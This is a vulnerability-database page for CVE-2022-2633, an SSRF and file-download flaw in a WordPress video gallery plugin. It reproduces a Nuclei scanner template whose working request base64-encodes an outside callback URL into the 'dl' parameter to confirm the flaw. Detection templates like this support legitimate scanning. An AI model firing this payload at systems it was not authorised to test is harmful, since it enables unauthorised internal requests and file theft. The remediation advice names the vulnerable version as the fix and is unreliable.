Vulners
Lucene search
All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2022-2633 | 6 Sep 202218:15 | – | attackerkb |
 | CVE-2022-2633 | 6 Sep 202222:13 | – | circl |
 | WordPress plugin All-in-One Video Gallery 安全漏洞 | 6 Sep 202200:00 | – | cnnvd |
 | CVE-2022-2633 | 6 Sep 202217:18 | – | cve |
 | CVE-2022-2633 | 6 Sep 202217:18 | – | cvelist |
 | CVE-2022-2633 | 6 Sep 202218:15 | – | nvd |
 | CVE-2022-2633 | 6 Sep 202218:15 | – | osv |
 | WordPress All In One Video Gallery Plugin 2.5.8 to 2.6.0 - Unauthenticated Arbitrary File Download & SSRF vulnerability | 18 Aug 202200:00 | – | patchstack |
 | Server side request forgery (ssrf) | 6 Sep 202218:15 | – | prion |
 | PT-2022-17789 · WordPress · All-In-One Video Gallery | 6 Sep 202200:00 | – | ptsecurity |
10
id: CVE-2022-2633
info:
name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.
impact: |
An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
remediation: |
Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability.
reference:
- https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994
- https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html
- https://wordpress.org/plugins/all-in-one-video-gallery/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2633
- https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/video.php#L227
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2022-2633
cwe-id: CWE-610
epss-score: 0.24542
epss-percentile: 0.97605
cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: plugins360
product: all-in-one_video_gallery
framework: wordpress
tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360,vuln
http:
- raw:
- |
@timeout: 10s
GET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Interactsh Server'
- type: status
status:
- 200
# digest: 4a0a00473045022054855f6584849c836e5d5e7ef1c1a96540bf0d06ee034020dc7e590ce67f70c2022100c6e12b9408419a47d798b72996a1e8271cfe74728d5a6350e1b6985281a729ed:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.5 - 8.2
EPSS0.24542
SSVC